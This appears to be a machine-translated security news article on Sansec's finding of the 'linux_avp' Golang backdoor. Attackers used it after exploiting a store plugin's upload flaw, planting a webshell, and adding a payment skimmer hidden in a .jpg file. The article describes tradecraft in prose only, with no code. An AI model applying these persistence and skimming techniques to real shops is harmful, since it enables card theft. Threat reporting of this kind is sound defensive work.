Sansec Threat Research Team researchers discovered a new malicious agent “Linux_avp”, which is hidden as a system process on e-commerce servers. They said that hackers started using this malware all over the world last week and needed commands from a control server in Beijing.
In the campaign, hackers launched automated e-commerce attack investigations and tested dozen of vulnerabilities in popular online shop platforms.
âAfter a day and a half, the attacker found a vulnerability while uploading files in one of the store’s plugins. He / she then uploaded a webshell and modified the server code to intercept customer data, âthe researchers said.
Researchers said hackers then called linux_avp. uploaded Malware, a Golang program that starts, removes itself from the hard drive, and disguises itself as a fake ps -ef process.
“Analysis of linux_avp suggests that it is acting as a back door, waiting for commands from a server hosted in Beijing (Alibaba),” the researchers said. The back door also revealed where the user known as “dob” created the back door in a project folder lin_avp, codenamed GREECE.
The malware also injects a malicious crontab entry to ensure access in case the process is removed or the server restarted. The crontab downloads the executable Golang malware into a randomly writable directory and installs two configuration files. “One contains a public key that is believed to be used to ensure that no one other than the malware owner can execute commands,” added the researchers.
This case has another Chinese connection, according to researchers, as a line has been added to the e-commerce platform’s code called app / design / frontend / favicon_absolute_top.jpg containing PHP code to get a fake payment form and paste it into the store . Researchers said the IP for this was hosted in Hong Kong and was previously observed as a skimming exfiltration endpoint in July and August of this year.
Researchers said that at the time of writing, no other antivirus vendor had detected the malware.
âStrangely, an individual had submitted the same malware on Virustotal on October 8th with the note “test”. This was only one day after the successful break-in into our customer’s shop, âsaid the researchers.
They added that the person uploading the malware could very well be the malware writer who wanted to claim that popular antivirus engines fail to detect their creation.
Why faster update cycles and modern infrastructure management are crucial for business success
The connection between modern server infrastructure and business agility
Four characteristics of executives in networked companies
Create more meaningful work experiences for employees
Modernize the data stack to transform the data experience
Next generation business intelligence and analytics
The three biggest IT problems of the new reality and how to solve them
Increase failure safety with standardized operations and service management